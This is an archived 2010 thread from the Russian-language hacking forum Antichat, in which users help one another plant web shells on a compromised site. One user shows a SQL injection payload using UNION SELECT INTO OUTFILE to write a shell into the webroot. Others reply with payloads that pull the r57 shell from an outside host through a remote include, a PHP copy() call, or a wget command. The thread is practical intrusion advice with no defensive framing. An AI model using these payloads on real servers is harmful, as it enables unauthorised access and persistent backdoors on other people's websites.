ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.06.2010, 23:38
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
а я о чем
значит только лимитом,или прогой что куда проще...
|
|
|
26.06.2010, 23:42
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
|
|
|
|
26.06.2010, 23:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
значит только лимитом,или прогой что куда проще...
я юзаю limit, но не все же таблицы наc интересуют ) дело 2 минут
|
|
|
|
26.06.2010, 23:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от FlaktW
FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
?v=include("yoursite.ru/r57.php"); (allow_url_include=On)
?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php;
но это при eval, зачем system
PHP код:
PHP:
[COLOR="#000000"]'[COLOR="#0000BB"][/COLOR]'[/COLOR]
|
|
|
|
27.06.2010, 00:12
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от FlaktW
FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
а почему сразу инклуд зделать нельзя?
|
|
|
|
27.06.2010, 00:14
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
потому что там allow_url_include Off Off
|
|
|
|
27.06.2010, 00:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
а почему сразу инклуд зделать нельзя?
а если Allow_url_include=Off??
написал выше...
|
|
|
|
27.06.2010, 00:20
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
а если
Allow_url_include=
Off
??
написал выше...
тогда
?cmd=wget http://site.ru/shell.php
|
|
|
|
27.06.2010, 00:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
тогда
?cmd=wget http://site.ru/shell.php
это уже другое дело, но нету гарантии что на сервере установлен wget )
зачем затруднять все (((
copy($source, $destination);
|
|
|
|
27.06.2010, 00:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от 547
547 said:
тогда
?cmd=wget http://site.ru/shell.php
там винда, вгет не пашет..
Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
